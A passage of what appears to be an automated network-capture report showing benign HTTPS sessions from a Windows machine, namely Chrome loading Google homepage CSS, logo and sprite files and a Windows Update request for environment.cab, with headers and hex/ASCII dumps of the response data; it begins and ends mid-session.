                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 4232
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:15 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:15 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 26 Sep 2024 19:25:19 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC581INData Raw: 3a 72 6f 6f 74 7b 2d 2d 43 4f 45 6d 59 3a 23 31 66 31 66 31 66 3b 2d 2d 78 68 55 47 77 63 3a 23 66 66 66 7d 3a 72 6f 6f 74 7b 2d 2d 76 5a 65 30 6a 62 3a 23 61 38 63 37 66 61 3b 2d 2d 6e 77 58 6f 62 62 3a 23 36 33 38 65 64 34 3b 2d 2d 56 75 5a 58 42 64 3a 23 30 30 31 64 33 35 3b 2d 2d 75 4c 7a 33 37 63 3a 23 35 34 35 64 37 65 3b 2d 2d 6a 49 4e 75 36 63 3a 23 30 30 31 64 33 35 3b 2d 2d 54 79 56 59 6c 64 3a 23 30 62 35 37 64 30 3b 2d 2d 5a 45 70 50 6d 64 3a 23 63 33 64 39 66 62 3b 2d 2d 51 57 61 61 61 66 3a 23 36 33 38 65 64 34 3b 2d 2d 44 45 65 53 74 66 3a 23 66 35 66 38 66 66 3b 2d 2d 54 53 57 5a 49 62 3a 23 65 35 65 64 66 66 3b 2d 2d 42 52 4c 77 45 3a 23 64 33 65 33 66 64 3b 2d 2d 67 53 35 6a 58 62 3a 23 64 61 64 63 65 30 3b 2d 2d 41 71 6e 37 78 64 3a 23
                                                                                                                                                                                                                                                                                          Data Ascii: :root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC1390INData Raw: 6c 54 64 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 7d 2e 79 55 54 4d 6a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 56 44 67 56 69 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 54 55 4f 73 55 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 73 6e 61 63 6b 62 61 72 2d 73 68 6f 77 7b 66 72 6f 6d 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30
                                                                                                                                                                                                                                                                                          Data Ascii: lTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:translateY(0
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC1390INData Raw: 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 36 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 38 38 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 62 37 37 48 4b 66 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 30 70 78 7d 7d 2e 56 39 4f 31 59 64 20 2e 72 49 78 73 76 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 7d 2e 56 39 4f 31 59 64 20 2e 73 48 46 4e 59 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 56 39 4f 31 59 64 20 2e 73 48 46 4e 59 64 20 67 2d 66 6c 61 74 2d 62 75 74 74 6f 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 6a 68 5a 76 6f 64 7b 6c 65 66 74 3a 31 36 70 78 3b 72 69 67 68
                                                                                                                                                                                                                                                                                          Data Ascii: :inline-block;max-width:568px;min-width:288px;text-align:left}.b77HKf{border-radius:8px}.sHFNYd{margin-left:40px}}.V9O1Yd .rIxsve{display:block;padding:8px 0}.V9O1Yd .sHFNYd{margin-left:0}.V9O1Yd .sHFNYd g-flat-button{padding-left:0}.jhZvod{left:16px;righ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC735INData Raw: 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 33 2e 34 33 35 70 78 3b 77 69 64 74 68 3a 31 33 2e 34 33 35 70 78 7d 2e 49 42 50 5a 75 20 2e 6f 51 63 50 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 74 6f 70 3a
                                                                                                                                                                                                                                                                                          Data Ascii: eft:1px solid rgba(0,0,0,.2);border-right:none;border-top:1px solid rgba(0,0,0,.2);box-sizing:border-box;height:13.435px;width:13.435px}.IBPZu .oQcPt{border-bottom:1px solid rgba(0,0,0,.2);border-left:none;border-right:1px solid rgba(0,0,0,.2);border-top:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC136INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 30 30 6d 73 2c 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 32 35 30 6d 73 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 69 6e 73 65 74 3a 30 7d 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 75 67 67 65 73 74 69 6f 6e 5f 67 72 6f 75 70 2e 63 73 73 2e 6d 61 70 20 2a 2f 73 65 6e 74 69 6e 65 6c 7b 7d
                                                                                                                                                                                                                                                                                          Data Ascii: ound-color 100ms,visibility 0s 250ms;position:fixed;visibility:hidden;inset:0}/*# sourceMappingURL=suggestion_group.css.map */sentinel{}


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          25192.168.2.74976120.114.59.183443
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d9DofA5AZfZodrn&MD=5fM4XGeV HTTP/1.1
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                          MS-CorrelationId: 83cb9b56-fc2e-47b6-ba17-a025e0a95d09
                                                                                                                                                                                                                                                                                          MS-RequestId: b001b5ce-2cd8-4501-a47d-6201b77514ba
                                                                                                                                                                                                                                                                                          MS-CV: XMQSaTPWQUeZrkWz.0
                                                                                                                                                                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:14 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 30005
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          26192.168.2.749763142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:15 UTC1364OUTGET /images/branding/googlelogo/1x/googlelogo_color_272x92dp.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 5969
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:16 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:16 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 10 00 00 00 5c 08 06 00 00 00 a6 e7 ea b6 00 00 17 18 49 44 41 54 78 01 ed 5d 0b 94 1c 55 99 be 3a d3 81 c0 2e 82 c2 2a 82 08 12 10 90 05 92 aa 9a 84 90 d8 5d b7 7b b2 41 e2 41 81 28 b8 bb 0a 08 8a 1b 5c 84 98 05 e5 31 9a ae 9a 09 89 c0 02 0a 41 40 36 e1 81 06 17 10 1f 90 cc 24 01 f4 08 28 c8 43 58 58 7c 10 1e 64 fa 11 92 49 55 75 1e 99 64 7a ef b7 e6 b8 a4 b7 67 e6 bf d5 75 bb aa 87 fb 9d 73 4f e7 31 d3 d3 67 ea d6 57 ff fd ff ef ff 7e 16 07 66 76 ad db 2b ed 54 4c ee 7a a7 71 d7 9f 63 bb c1 65 b6 eb 3b dc f1 7b c4 df e7 8b bf 5f 22 d6 b9 d9 ee 60 56 da f5 8f 4e 77 55 77 67 1a 1a 1a ef 4c a4 7b 36 1f cc 9d ca 79 dc 0d ee b2 5d ff cf e2 b5 2a b3 32 79 6f bb 78 7d 5e 7c ef cd dc f5 ff 29 dd e5 ed cb
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR\IDATx]U:.*]{AA(\1A@6$(CXX|dIUudzgusO1gW~fv+TLzqce;{_"`VNwUwgL{6y]*2yox}^|)
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 43 84 69 68 68 02 89 07 5d 5d d5 77 73 d7 7f 4c 92 3c e6 31 0d 0d 0d 4d 20 82 0c 3e 2f 79 6c b9 86 1e 79 68 68 8c 59 68 02 99 79 ed d0 6e dc f5 d6 48 94 69 57 21 d9 ca 34 34 34 34 81 70 27 38 47 82 3c d6 a1 8c ca 34 34 34 34 81 20 f7 21 d3 24 27 92 95 5f 60 80 86 86 86 26 10 f4 ba c8 68 3d 40 38 0c d0 d0 d0 d0 04 c2 f3 c1 9d 54 02 41 6f 0c 03 34 34 34 34 81 a0 23 96 da 69 9b 71 fd 27 74 d5 a5 75 a0 a1 09 a4 da c5 de 8d c5 54 01 e2 2b 6a f4 41 53 79 6a 54 d3 e9 f6 75 dc e8 28 66 cd 79 c5 ac 75 77 81 1b bf 2d 65 8d 42 c9 b6 2a 85 ac 35 84 57 fc 1d ff 2e fe ff ae a2 6d 7e bd 9c 35 2d 7c 5f 22 3e ff 6a d6 be ad af bd 63 5b 6f fb bc 6d 2b da ef 1e ec 4b fd 76 eb 8a 54 61 6b 5f aa 22 fe 5c 15 7f 1e 14 ab 3c d8 db f6 8c f8 ba 1f 89 75 b1 f8 da e3 f1 7d 2c 01 c0
                                                                                                                                                                                                                                                                                          Data Ascii: Cihh]]wsL<1M >/ylyhhYhynHiW!4444p'8G<4444 !$'_`&h=@8TAo4444#iq'tuT+jASyjTu(fyuw-eB*5W.m~5-|_">jc[om+KvTak_"\<u},
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 43 0f b1 f7 8a 23 ce 72 99 ca cc 96 87 c6 1d 31 aa d5 c4 4e b1 23 71 fd 11 92 83 b0 09 5a 54 77 92 40 20 90 a4 4b 44 a3 cf 23 ca 0d 59 51 5c 48 8c 42 9e c5 91 aa 36 2c bc 92 96 44 f5 1e 1c f3 11 88 13 5c 3c cc 85 5c 2a 71 21 ef ad 1a 46 8a 35 80 ea ec a3 c6 15 b3 d6 4f 24 7e e6 6d 6c 04 88 68 62 89 c4 b1 e2 9e 46 fb 59 aa 4f b2 94 78 9f fb 24 a2 9d 11 f3 6b 19 c7 3b 55 86 3c a6 3b c1 fe ac 01 80 7c 32 6e f0 56 d3 09 a4 f6 98 91 b5 7c 62 14 fa 5f 88 56 1a e9 db c2 51 9b f2 b3 10 55 d7 3a b0 cf 25 26 51 5f 1e eb 04 62 77 07 5f 67 35 28 e7 26 7e 90 aa f7 28 64 cd 27 11 16 32 02 68 6a 43 e3 19 a2 c8 6c 10 99 fa ba 11 c1 83 6c 7f b2 de 63 45 ea 09 91 93 d8 8d 45 80 a1 5f b3 f1 22 2f f2 3b 6a 14 32 b4 62 fc b0 ee 76 f0 9f 21 b6 5a 78 c8 75 b0 08 20 f6 c2 8c 38
                                                                                                                                                                                                                                                                                          Data Ascii: C#r1N#qZTw@ KD#YQ\HB6,D\<\*q!F5O$~mlhbFYOx$k;U<;|2nV|b_VQU:%&Q_bw_g5(&~(d'2hjCllcEE_"/;j2bv!Zxu 8
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 0d 7f e3 9a a7 13 2f d6 0f 98 42 60 68 10 d1 bf f2 33 ec 6d d8 de 97 3a 9d 56 3e 6d bb 45 71 19 f7 0e ca e7 c0 e7 dd c5 81 2c bf f9 10 e2 3e 7c 89 29 42 6e be 77 64 93 85 64 d8 77 3d 0d 3a f8 3f 02 43 21 9a cc 5d 01 30 40 4a 72 86 c6 d2 d9 cb aa 6d 2c 01 80 7a 51 90 da 6f c9 47 31 a7 72 f2 b0 12 e0 f4 e4 83 89 5d b8 eb c3 74 e1 52 65 c8 d4 b6 ee da 27 cd e6 d5 bb 1d 4c ac 7e bc 25 5a f8 95 7c 7e e4 57 44 72 d4 a3 7c 8e cd cb 77 3b a4 f6 e9 4f 95 17 a0 08 c0 14 00 1a 93 a6 2b 51 73 e6 29 21 88 c3 2f 71 eb 7b 30 5f 8e ff 26 5c 18 7c 40 90 c8 7a c9 6e d6 65 18 f2 c3 62 c4 cc ae 75 7b 71 37 78 44 22 7a 7a 7a b4 06 2c 6a b7 62 39 6b 7e 49 51 33 dd bf 12 37 d0 1f ea 3b b0 b7 bd 42 24 91 73 14 4d bc fb 2a e5 e7 e3 73 d6 73 3f e3 f9 e0 4e 62 1e eb 56 05 f3 75 db
                                                                                                                                                                                                                                                                                          Data Ascii: /B`h3m:V>mEq,>|)Bnwddw=:?C!]0@Jrm,zQoG1r]tRe'L~%Z|~WDr|w;O+Qs)!/q{0_&\|@znebu{q7xD"zzz,jb9k~IQ37;B$sM*ss?NbVu
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1080INData Raw: 35 71 cf fd be 90 35 3f c2 54 03 c2 2c 54 56 70 03 c7 73 5c 81 fd bf b7 04 19 75 d6 44 94 b2 1d 27 29 0e 2d 51 3e 5b 8b 11 13 4c 01 44 27 ee 49 22 09 da af 92 38 f0 fe 98 f4 af 46 4c 58 b1 60 2b a1 60 3f 55 60 54 04 55 75 92 08 04 78 79 e6 84 dd f0 30 41 45 44 2d 79 98 37 10 12 a6 d1 13 09 ca a5 b6 eb bd d6 ac 88 03 ea 43 94 7e 59 93 51 33 08 79 11 ca aa 51 db ce 95 b2 e6 95 aa 1b a5 44 3e 62 2f 11 1d 2c c2 78 cb 48 89 03 ef 87 a8 03 93 fe 15 02 33 61 6c d7 ff 56 54 0f af bf 54 1a fd 63 98 00 85 40 90 a8 57 42 20 84 36 8b 02 b7 1e 8e 9a 38 10 e1 14 73 c6 34 16 27 a0 04 84 f0 cb 76 fc 5b b8 1b 94 23 26 8d 6d f0 21 e1 4e 70 4e 6e c1 7a 85 9b 53 be 09 a9 c4 ad 6e 44 24 8d 46 1c c5 ac e9 d4 cc e2 50 0e e8 3d c4 8d df dd 68 44 b2 b3 81 ae 07 fa 90 66 77 91 43
                                                                                                                                                                                                                                                                                          Data Ascii: 5q5?T,TVps\uD')-Q>[LD'I"8FLX`+`?U`TUuxy0AED-y7C~YQ3yQD>b/,xH3alVTTc@WB 68s4'v[#&m!NpNnzSnD$FP=hDfwC


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          27192.168.2.749764142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1358OUTGET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
